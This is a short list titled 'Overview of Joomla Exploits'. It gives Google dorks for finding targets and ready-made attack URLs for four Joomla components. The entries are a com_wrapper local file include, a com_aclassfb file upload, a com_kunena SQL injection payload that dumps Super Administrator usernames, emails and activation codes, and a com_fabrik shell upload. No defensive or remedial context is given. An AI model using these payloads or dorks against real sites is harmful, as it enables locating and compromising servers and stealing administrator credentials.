Overview of Joomla Exploits
1. Joomla Component (com_wrapper) Local File Include
# Date : 13/05/2013
# Exploit : +http://[Target]/[Path]/index.php?option=com_wrapper&view=wrapper& Itemid=../../../../../[LFI%00]
2. Joomla com_aclassfb File Upload Vulnerability
#Google Dork: inurl:com_aclassfb
#Date : 10/01/2014
#Vendor : http://www.almondsoft.com
#File Upload: http://127.0.0.1/index.php?option=com_aclassfb #Exploit : http://[target]/index.php?option=com_aclasfb&Itemid=[ID]&ct=[CATEGORY]&md=add_form
3. Joomla com_kunena SQL Injection (Automatic activation code retriever) #Google Dork: "inurl:index.php?option=com_kunena" or "inurl:?option=com_kunena"
#Date : 12/05/2013
#Vendor homepage: http://www.kunena.org/
#Vulnerable path: http://[target]/index.php?option=com_kunena&func=userlist&search=%25'+and+1=2)+union+select+1,1,concat (username,0x3a,0x3a,0x3a,0x3a,email,0x3a,0x3a,activation,0x3a,usertype) ,1,1,1,1,62,1,1,0,0,0,1,15+from+jos_users+where+usertype='Super Administrator' -- ;
4. Joomla Component (com_Fabrik) Remote Shell Upload Vulnerability
# Google Dork: "inurl:index.php?option=com_fabrik" or "index.php?option=com_fabrik"
# Date : 14/09/2012
# Vendor Homepage : http://fabrikar.com/
# Vulnerable path:
http://[target]/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
In this webpage there is the possibility of upload any type of files (php,asp,html,jpg .. ) through the form "Import CSV".